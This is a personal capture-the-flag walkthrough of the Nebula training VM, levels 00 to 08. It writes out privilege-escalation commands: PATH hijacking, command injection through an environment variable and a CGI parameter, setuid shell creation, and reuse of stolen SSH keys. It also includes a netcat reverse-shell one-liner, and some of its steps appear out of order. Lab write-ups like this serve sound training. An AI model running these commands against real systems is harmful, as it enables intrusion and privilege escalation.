I’ve been having a go at nebula just for the lulz and it seems like an interesting VM since it has covered a gamut of vulnerabilities ranging from crappy PATH issues to the cool python pickle functions. I thought a write up of this was due even though i seen countless versions online; just for a feeling of satisfaction and for archiving the way I did ( to laugh at myself years later).
NOW if you are like me connecting from to your VM via ssh there is a high probability that you will encounter the following error-
“Couldn’t agree on a host key algorithm (available:ecdsa-sha2-nistp256)” or something along those lines
Not to worry - do the following to generate a fresh set of ssh keypair-
>login to the nebula account..
cd /etc/ssh sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key vi /etc/ssh/sshd_config Uncomment this line (if commented) HostKey /etc/ssh/ssh_host_dsa_key chgrp ssh_keys ssh_host_dsa_key sudo service sshd restart
Now thats out of the way ->
Level00 Pretty straightforward , more probably a warm-up exercise. Asks you to find an executable with setuid bit set for user flag00
find / -perm /u=s -user flag00 2>/dev/null /bin/…/flag00 /rofs/bin/…/flag00 level00@nebula:~$ /rofs/bin/…/flag00
Congrats, now run getflag to get your flag! flag00@nebula:~$ getflag You have successfully executed getflag on a target account
This is a straight forward path manipulation trick
This essentially puts the first path where the system searches for echo as /tmp and is similar to Windows DLL Hijacking Once you run the flag01 executable you should get the flag.
So i created a symbolic link ln -s /bin/getflag /tmp/echo and changed the path as PATH=/tmp:$PATH
Once again it does an echo based on the env variable USER, we could manipulate it by doing something like the below -
This is a lazy man’s way of getting the file to execute a shell, but once again u get a shell running in the context of flag02. Run your getflag for the wins :P
USER=‘hi;/bin/sh;’ export USER
Level03 The flag03 folder shows a bash script and a writable directory which executes anything in the folder before removing it :) What i did was create a bash script called crap in writable.d and a c program which invoked a bash shell with uid gid etc as 996 (You can get the uid of flag03 by doing an cat /etc/passwd). My “crap” file in writeable looked like this cat crap
`#!/bin/sh gcc -o /home/flag03/flagzuser /tmp/run.c;chmod +s,a+rwx /home/flag03 /flagzuser
Once writeable.sh is run you get an executable with setuid bit set .Run it and execute getflag.
This is a fun one too, looking at the source code you can see that the program does not read the file called “token” but that’s where our flag is
-_- . Symbolic linking time!!
Level05 This one actually reflects what might happens when you get a shell during a pentest . A pen tester’s dream would be to use that uber cool remote exploit to 1 shot and get a remote # shell. But most of privilege escalations happen by poking around and finding a misconfiguration or in this case ssh keys :p Doing an ls -al shows an nice juicy directory called .backup
ln -s /home/flag04/token /tmp/crap Then run ./flag04 /tmp/crap You should get a token 06508b5e-8909-4f38-b630-fdb148a848a2
Extracted the tgz file into /tmp/flag05 mkdir -p /tmp/flag05 tar xvzf backup-19072011.tgz -C /tmp/flag05/ went to /tmp/flag05/.ssh and ssh -i id_rsa firstname.lastname@example.org You should be able to run getflag ;)
The hint on the site says its a legacy unix system challenge do /etc/passwd. Notice that flag06 has an hash in its entry take hash,crack with John the ripper and get flag06 password which is hello ??? getflag ! :)
Flag07 The thttpd conf file shows that it runs an http server on port 7007 If you connect to the index.cgi it shows a ping usage and as per the source code you get to pass a variable to CGI script called Host. I passed ?Host=localhost and got the results back. Tried ?Host=localhost;id but didnt work since you need to encode the ; as %3B (Html encoding -) . Now that i see that the id is for flag07 i passed the following ?Host=localhost%3Bgetflag Which displayed the flag information. You could probably go about it a cooler way by html encoding a command for a reverse shell back to your attacking VM :)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc
Make sure you encode the command before sending it accross !
Flag08 I learned something from this flag too -> 0x7f = backspace If you do a tcpdump -qns 0 -A -r capture.pcap or transfer the pcap to wirehsark and view in hex view you will see that there are a couple of 0x7f or . after the backdoor, so essentially the password becomes backd00Rmate. Do a su with flag08 and password as backd00Rmate. You should get your flag
Flag 09-Flag18 in the next part